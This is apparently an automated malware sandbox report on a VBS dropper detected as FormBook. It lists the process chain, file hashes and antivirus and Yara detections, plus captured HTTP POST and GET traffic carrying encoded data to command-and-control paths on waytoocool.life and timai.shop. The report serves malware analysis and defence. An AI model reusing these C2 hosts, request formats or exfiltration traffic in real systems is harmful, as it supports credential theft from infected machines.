                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:41:58.800487041 CET | 669 | OUT | POST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Ascii: -V8=n5PTG5vOd7NNDYwEjGfKAMokOoHfdd1E3Eh+5bHlFQvQ6yQNKZPiqlvNTbDBdMkiVNwSSpIif7YFoRYLnYzO1jvziGLPVZCXbd5jQUtlP+6HkLYmMNgMWgNweJ8RZyono/r2UvUeHB36USkugcAS8DjzzhhVfws7KFgDkb+3qljq3RkKljvhhsFtD2Qbx9Jr6fuJ0raEVKV72HIfSIf6T35+atk5
                                                Dec 17, 2024 03:41:59.898473978 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:41:59 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.5 | 49931 | 52.60.87.163 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:01.467783928 CET | 1686 | OUT | POST /nydx/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.waytoocool.life
                                                Origin: http://www.waytoocool.life
                                                Referer: http://www.waytoocool.life/nydx/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Ascii: -V8=n5PTG5vOd7NNDYwEjGfKAMokOoHfdd1E3Eh+5bHlFQnQmXcNYq3itlvNe7DMdMliVNoWSp0yf+cFo2wLvJzO/jvz/WLKKpCGbcVnQU9lP+6HkKomcJMMGQNzXp8Vdypwo/yNUvB8ExX6UyUuiq0S0Djx+BhNfwxjKF8hkbKNqnDqmUR3yjzpg9VhOlketNVx9f6ZrsPmfphO3yEvWpugHRZZa7Ri6QXsLrQ0jTkL6XqZXLfjXBTLDpm7ble504GQjlfTWaTMPp0cL0doFkDDo+/t7WNyjd1LXChPZiDWnXhszzddp+mThJ4MLafH2Ak5LQTN74qFQhE5sY0SQsf/wowDQmswq6X4zJWv1pw9+dZFsv3tvLZbn53GiuNJD8FrMe6GD2u+8eI8lYHyhqO8+OvldiCNOx8gbfvxtILfA3PiNTG9+79b6BHGPxFBkqluVbCi/D4PNRBjYulXcYHDqSZqoGo4fF2ots/cG83DRHzZLB8RLcgr4hk21zUjX3yd+qkMmmGp+dMX5KBm8H0gD1gUoZxSTo0dMn8RrKhAlJl0cy6kQU2ApxInPkG0P7KFxLglbDqWwdRgp+0Nk1BEJJXrgjdPgfDFTkPdt4UjzVRMsYwD0ZoVavIgO8+JyZ5pN30DX8rC9MQoJAVgFWXgaYRqPfJktqEL4JaIE7JnPsVzUM4EUb6W7gfe+OSH30PHCSJmKHa1/yS279iNws02UFAyl3C/cMA7VAXPpFubColUh28rE8iOphyvoop5U01qXIem2Dlyf2XBmZshnQZ6va/astgoJ/MvfeDNOXzf8FeiPAOuVXK84/SoCcCgE1/9ksXmS+VDkDJKuxXubOwnadq3MksIsisAqHo6Cefc6CEqw/4nEKF9/GJG/4MG9ksGM3EsWg7FHNPXO6bIMEGGmfQMmyl7McFO3dxmwKxSa9EVmJw3EFq3CEXfrypIvyrY74lo7DqOIJ0AbIUM7I5tE2UK8njpizN1vClafRpBuHVCAEXX [TRUNCATED]
                                                Dec 17, 2024 03:42:02.625368118 CET | 295 | IN | HTTP/1.1 405 Not Allowed
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:02 GMT
                                                Content-Type: text/html
                                                Content-Length: 150
                                                Connection: close
                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.5 | 49941 | 52.60.87.163 | 80 | 4444 | C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:04.124947071 CET | 388 | OUT | GET /nydx/?-V8=q7nzFJj3afdOFJJfiG7XJfkkRIbmdsBL0Xh9x7HOO1bMwAYpIu+EkXrpUMzqVtVwT+pWdZ8+fZkDpnUDi5L0pxX3zg/WB9ChebFWf29eE9HJh+d3M/EMfjpTQLNaei8vxw==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.waytoocool.life
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:42:05.227713108 CET | 1236 | IN | HTTP/1.1 200 OK
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 17704
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: max-age=604800
                                                Expires: Sun, 22 Dec 2024 23:38:04 +0000
                                                Content-Security-Policy: default-src 'self' 'unsafe-inline' https://park.101datacenter.net https://*.deviceatlascloud.com/ https://cs.deviceatlas-cdn.com data:
                                                Access-Control-Allow-Origin: https://park.101datacenter.net
                                                X-Frame-Options: SAMEORIGIN
                                                X-Cached: HIT
                                                Data Ascii: <!DOCTYPE html><html dir="ltr" lang="en" ><head><title>Future home of waytoocool.life</title><meta name="description" content="Domain Name Registration - register your domain name online,and get the name you want while it's still available. Internet Domain Registration & International Domain Name Registration."><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /><meta name="robots" content="index, follow" /><meta name="googlebot" content="index, follow" /><meta NAME="revisit-after" CONTENT="15 days"><script type="text/javascript">resource_url = decodeU
                                                Dec 17, 2024 03:42:05.227760077 CET224INData Raw: 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 27 68 74 74 70 73 25 33 41 25 32 46 25 32 46 70 61 72 6b 2e 31 30 31 64 61 74 61 63 65 6e 74 65 72 2e 6e 65 74 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74
                                                Data Ascii: RIComponent('https%3A%2F%2Fpark.101datacenter.net');</script><link rel="shortcut icon" href="https://park.101datacenter.net/images/vendor-1/icon/101domain.ico"><link rel="preload" as="font" type="font/woff2" crossorigin="
                                                Dec 17, 2024 03:42:05.227838993 CET1236INData Raw: 61 6e 6f 6e 79 6d 6f 75 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 61 72 6b 2e 31 30 31 64 61 74 61 63 65 6e 74 65 72 2e 6e 65 74 2f 63 73 73 2f 66 6f 6e 74 73 2f 4c 61 74 6f 52 65 67 75 6c 61 72 2e 77 6f 66 66 32 22 20 2f 3e 0a 3c 6c
                                                Data Ascii: anonymous" href="https://park.101datacenter.net/css/fonts/LatoRegular.woff2" /><link rel="preload" as="image" type="image/webp" href="https://park.101datacenter.net/images/vendor-1/park-back.webp" /><style type="text/css">@font-face{font-fa
                                                Dec 17, 2024 03:42:05.227982044 CET | 1236 | IN | Data Raw: 65 64 2c 2e 70 61 67 65 2d 73 65 63 74 69 6f 6e 2e 63 65 6e 74 65 72 65 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 7d 2e 70 61 67 65 2d 68 65 61 64 65 72 20 68 31 7b 63 6f 6c 6f
                                                Data Ascii: ed,.page-section.centered{text-align:center;align-self:center}.page-header h1{color:#6dcff6;font-size:1.5rem;font-weight:400;line-height:1.4;margin:2rem 0}.page-header h1 strong{color:#fff;display:block}.choice .col-base{background-color:#fff;
                                                Dec 17, 2024 03:42:05.227991104 CET | 1236 | IN | Data Raw: 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 72 65 6d 7d 2e 75 70 73 65 6c 6c 20 68 33 20 69 6d 67 7b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 3b 77 69 64 74 68
                                                Data Ascii: :center;justify-content:center;font-size:1.1rem}.upsell h3 img{height:1.5rem;width:auto}.upsell h3 svg{height:1.5rem;width:1.5rem;fill:#00aeef;margin-right:.5rem}.upsell p{font-size:.9rem;line-height:1.4;margin:0 0 1.5rem 0}.upsell .button{bac
                                                Dec 17, 2024 03:42:05.228246927 CET | 1236 | IN | Data Raw: 6c 6c 20 2e 63 6f 6c 2d 62 61 73 65 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 75 70 73 65 6c 6c 20 2e
                                                Data Ascii: ll .col-base:last-child{border-right:none;padding-right:0;margin-right:0}.upsell .button:hover{background-color:#f0db64}}@media only screen and (min-width:55.063em) and (max-width:77em){.upsell h3{min-height:3rem}}@media only screen and (min-w
                                                Dec 17, 2024 03:42:05.228256941 CET | 1236 | IN | Data Raw: 2d 69 63 6f 6e 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 37 2e 38 33 20 32 32 2e 32 37 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 31 2e 32 32 2c 38 2e 33 35 68 2d 36 2e 36 31 76 32 2e 34 34 63 30 2c 31 2e 37 33 2d 31 2e 34 2c 33 2e 31 33 2d
                                                Data Ascii: -icon" viewBox="0 0 27.83 22.27"><path d="M21.22,8.35h-6.61v2.44c0,1.73-1.4,3.13-3.13,3.13s-3.13-1.4-3.13-3.13V5.5l-2.82,1.7C4.69,7.69,4.18,8.6,4.18,9.58v2.06 L0.7,13.64c-0.67,0.38-0.9,1.24-0.51,1.9l3.48,6.03c0.38,0.67,1.23,0.89,1.9,0.51l4.5-
                                                Dec 17, 2024 03:42:05.228266001 CET | 1236 | IN | Data Raw: 0a 3c 70 61 74 68 20 64 3d 22 4d 31 33 2e 39 2c 31 31 2e 33 37 63 33 2e 31 37 2c 30 2c 35 2e 37 33 2d 32 2e 35 34 2c 35 2e 37 33 2d 35 2e 36 38 43 31 39 2e 36 33 2c 32 2e 35 34 2c 31 37 2e 30 36 2c 30 2c 31 33 2e 39 2c 30 63 2d 33 2e 31 37 2c 30
                                                Data Ascii: <path d="M13.9,11.37c3.17,0,5.73-2.54,5.73-5.68C19.63,2.54,17.06,0,13.9,0c-3.17,0-5.73,2.54-5.73,5.68 C8.16,8.82,10.73,11.37,13.9,11.37z M10.31,5.79l0.52-0.52c0.14-0.14,0.38-0.14,0.52,0l1.62,1.61l3.47-3.44 c0.14-0.14,0.38-0.14,0.52,0l0.52,0.5
                                                Dec 17, 2024 03:42:05.228593111 CET | 1236 | IN | Data Raw: 30 2c 31 2e 35 32 2c 31 2e 32 35 2c 32 2e 37 37 2c 32 2e 37 37 2c 32 2e 37 37 68 32 32 2e 31 34 63 31 2e 35 32 2c 30 2c 32 2e 37 37 2d 31 2e 32 35 2c 32 2e 37 37 2d 32 2e 37 37 76 2d 30 2e 36 39 43 32 37 2e 36 38 2c 32 32 2e 38 2c 32 37 2e 33 37
                                                Data Ascii: 0,1.52,1.25,2.77,2.77,2.77h22.14c1.52,0,2.77-1.25,2.77-2.77v-0.69C27.68,22.8,27.37,22.49,26.99,22.49z M13.84,11.41 c3.15,0,5.71-2.55,5.71-5.71S16.99,0,13.84,0c-3.15,0-5.71,2.55-5.71,5.71S10.69,11.41,13.84,11.41z M11.5,4.28 c-0.11-0.11-0.11-0.2
                                                Dec 17, 2024 03:42:05.228606939 CET | 1236 | IN | Data Raw: 2d 32 2e 35 2d 32 2e 35 48 39 2e 31 36 63 2d 31 2e 33 33 2c 30 2d 32 2e 35 2c 31 2e 31 37 2d 32 2e 35 2c 32 2e 35 56 35 48 32 2e 35 20 43 31 2e 31 37 2c 35 2c 30 2c 36 2e 31 36 2c 30 2c 37 2e 34 39 76 34 2e 31 36 68 32 36 2e 36 34 56 37 2e 34 39
                                                Data Ascii: -2.5-2.5H9.16c-1.33,0-2.5,1.17-2.5,2.5V5H2.5 C1.17,5,0,6.16,0,7.49v4.16h26.64V7.49C26.64,6.16,25.48,5,24.14,5z M16.65,5H9.99V3.33h6.66V5z"/></symbol><symbol id="fs-icon" viewBox="0 0 60 60"><path d="M0,59.4V60h14.9V48.3l9.9-4V60H30V40.7l9.9
                                                Dec 17, 2024 03:42:05.347732067 CET | 1236 | IN | Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 68 33 3e 4e 6f 2c 20 74 68 69 73 20 69 73 20 6e 6f 74 20 6d 79 20 64 6f 6d 61 69 6e 2e 3c 2f 68 33 3e 0a 3c 70 3e 42 75 74 20 49 20 77 6f 75 6c 64 20 6c 69 6b 65 20 69 74 20 74 6f 20 62 65 2e 3c 2f 70 3e 0a 3c 61 20
                                                Data Ascii: ></div><h3>No, this is not my domain.</h3><p>But I would like it to be.</p><a class="choice-link no" href="https://www.101domain.com/domain_concierge_service.htm?query=waytoocool.life&utm_campaign=parked-page&utm_medium=referral&utm_source


                                                Session ID:17
                                                Source IP:192.168.2.5
                                                Source Port:49957
                                                Destination IP:18.166.177.211
                                                Destination Port:80
                                                PID:4444
                                                Process:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:11.776240110 CET | 634 | OUT | POST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 204
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6e 53 4a 4c 55 71 2f 68 42 2f 4e 37 6e 42 35 30 30 4f 49 54 6d 78 67 6c 76 4a 38 6e 39 66 64 33 50 6a 47 73 75 63 72 78 71 44 45 56 6b 47 57 56 55 42 6e 35 66 54 6d 4c 42 32 41 39 44 6f 67 46 77 41 34 41 59 51 68 77 70 47 46 63 4b 77 79 51 30 61 77 71 32 42 57 6d 66 62 39 6d 78 33 55 6a 62 65 70 72 49 76 64 77 52 59 70 46 5a 72 35 45 71 45 62 32 6c 32 4c 31 69 41 71 72 72 4f 30 77 75 77 4a 6b 4d 35 33 7a 31 68 4a 34 4e 69 68 65 63 43 55 71 72 65 79 72 42 71 4c 64 7a 33 76 52 6c 44 45 73 6f 6b 63 63 2b 68 32 33 49 4e 6b 50 75 4f 49 33 67 4d 75 73 51 77 4d 3d
                                                Data Ascii: -V8=sqZgZqNfUkadnSJLUq/hB/N7nB500OITmxglvJ8n9fd3PjGsucrxqDEVkGWVUBn5fTmLB2A9DogFwA4AYQhwpGFcKwyQ0awq2BWmfb9mx3UjbeprIvdwRYpFZr5EqEb2l2L1iAqrrO0wuwJkM53z1hJ4NihecCUqreyrBqLdz3vRlDEsokcc+h23INkPuOI3gMusQwM=


                                                Session ID:18
                                                Source IP:192.168.2.5
                                                Source Port:49963
                                                Destination IP:18.166.177.211
                                                Destination Port:80
                                                PID:4444
                                                Process:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:14.435077906 CET | 654 | OUT | POST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 224
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6b 79 35 4c 5a 70 58 68 57 76 4e 34 6b 42 35 30 39 75 49 66 6d 32 6f 6c 76 4d 64 36 39 70 4e 33 50 48 43 73 70 5a 48 78 6d 6a 45 56 72 6d 58 64 51 42 6e 77 66 54 72 6f 42 32 73 39 44 72 63 46 77 42 49 41 59 44 49 43 6f 57 46 53 48 51 79 53 37 36 77 71 32 42 57 6d 66 62 35 63 78 33 4d 6a 61 75 5a 72 4a 4b 70 33 62 34 70 4b 4f 62 35 45 38 30 62 36 6c 32 4c 58 69 43 54 4d 72 4c 77 77 75 31 31 6b 4d 6f 33 77 6d 42 4a 36 41 43 67 36 54 7a 39 68 75 75 50 72 4a 62 53 67 6a 57 48 71 74 56 31 47 79 47 55 30 74 42 61 50 59 65 73 34 2f 2b 70 65 36 76 2b 63 4f 6e 5a 6a 59 47 4c 7a 6d 65 2f 50 4f 55 61 61 41 70 5a 30 6c 59 4c 63
                                                Data Ascii: -V8=sqZgZqNfUkadky5LZpXhWvN4kB509uIfm2olvMd69pN3PHCspZHxmjEVrmXdQBnwfTroB2s9DrcFwBIAYDICoWFSHQyS76wq2BWmfb5cx3MjauZrJKp3b4pKOb5E80b6l2LXiCTMrLwwu11kMo3wmBJ6ACg6Tz9huuPrJbSgjWHqtV1GyGU0tBaPYes4/+pe6v+cOnZjYGLzme/POUaaApZ0lYLc
                                                Dec 17, 2024 03:42:16.014107943 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID:19
                                                Source IP:192.168.2.5
                                                Source Port:49974
                                                Destination IP:18.166.177.211
                                                Destination Port:80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:17.451250076 CET | 1671 | OUT | POST /xsla/ HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1240
                                                Connection: close
                                                Cache-Control: max-age=0
                                                Host: www.timai.shop
                                                Origin: http://www.timai.shop
                                                Referer: http://www.timai.shop/xsla/
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Data Raw: 2d 56 38 3d 73 71 5a 67 5a 71 4e 66 55 6b 61 64 6b 79 35 4c 5a 70 58 68 57 76 4e 34 6b 42 35 30 39 75 49 66 6d 32 6f 6c 76 4d 64 36 39 70 46 33 49 79 57 73 76 36 2f 78 6c 6a 45 56 31 57 58 65 51 42 6d 69 66 58 4f 68 42 32 51 79 44 74 59 46 78 6e 30 41 50 69 49 43 6a 57 46 53 4f 77 79 58 30 61 78 33 32 42 6e 76 66 62 4a 63 78 33 4d 6a 61 73 42 72 4e 66 64 33 49 6f 70 46 5a 72 35 49 71 45 62 57 6c 33 6a 39 69 43 57 37 72 59 49 77 75 56 46 6b 4e 61 66 77 38 42 4a 38 42 43 67 69 54 7a 68 75 75 74 71 53 4a 62 6d 65 6a 56 58 71 75 7a 67 64 33 33 64 6f 75 58 47 4e 66 35 55 64 75 36 39 43 6e 73 57 66 43 56 68 53 64 55 48 64 6f 37 33 67 44 57 6e 68 63 50 4a 4f 67 4f 66 63 44 79 48 6d 78 38 5a 75 67 4b 4c 36 69 64 49 69 48 7a 79 36 6d 43 39 39 41 70 4a 67 42 50 66 33 4a 76 35 72 46 51 57 63 6c 58 71 43 43 56 51 45 34 2f 47 6d 35 57 79 30 65 58 43 34 45 50 62 6c 6a 69 52 7a 36 50 39 63 72 30 61 58 65 57 46 44 4e 63 65 4c 66 64 4e 79 4d 67 49 32 63 44 62 57 39 64 2b 64 2b 37 74 6d 76 34 4e 39 70 42 49 2b 30 2f [TRUNCATED]
                                                Data Ascii: -V8= [TRUNCATED]
                                                Dec 17, 2024 03:42:19.036968946 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:18 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID:20
                                                Source IP:192.168.2.5
                                                Source Port:49980
                                                Destination IP:18.166.177.211
                                                Destination Port:80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Dec 17, 2024 03:42:20.107106924 CET | 383 | OUT | GET /xsla/?-V8=hoxAaasoZBOD0j1KZ83XYOlI1AJE1doQvwEl/6A98KlFBwCru8LBuQoutmWPazGrcTbrOkYKG6VMwnANAgx3/U5cHXy83Zs53QS9fb9clXtmfZkgH8FbRqFEUKF+mnaT3w==&2H=b6QHb8C0WpQhtV HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-US,en;q=0.9
                                                Connection: close
                                                Host: www.timai.shop
                                                User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (Splashtop-v1.2.13.0)
                                                Dec 17, 2024 03:42:21.676249027 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 17 Dec 2024 02:42:21 GMT
                                                Content-Type: text/html
                                                Content-Length: 146
                                                Connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                                                Target ID:0
                                                Start time:21:40:06
                                                Start date:16/12/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO1341489LTB GROUP.vbs"
                                                Imagebase:0x7ff74d750000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:21:40:11
                                                Start date:16/12/2024
                                                Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                Imagebase:0xe80000
                                                File size:335'360 bytes
                                                MD5 hash:D9A430A4C9B06A9C5F69147498335567
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 55%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:21:40:12
                                                Start date:16/12/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                Imagebase:0xdb0000
                                                File size:56'368 bytes
                                                MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2338722204.0000000001810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2339680542.0000000001BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2338151410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:21:40:32
                                                Start date:16/12/2024
                                                Path:C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Program Files (x86)\LpktEEEOouwnfKcOSvSCazLlTTqvDTCpPneaXBBgVQwbzBChAtHAvXhBTVIiYnTAfJpNSWGFzmOx\JogKDBeJAc.exe"
                                                Imagebase:0xf90000
                                                File size:140'800 bytes
                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3304435992.0000000002710000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:false

                                                Target ID:6
                                                Start time:21:40:33
                                                Start date:16/12/2024
                                                Path:C:\Windows\SysWOW64\chkntfs.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\chkntfs.exe"
                                                Imagebase:0x1a0000
                                                File size:19'968 bytes
                                                MD5 hash:A9B42ED1B14BB22EF07CCC8228697408
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
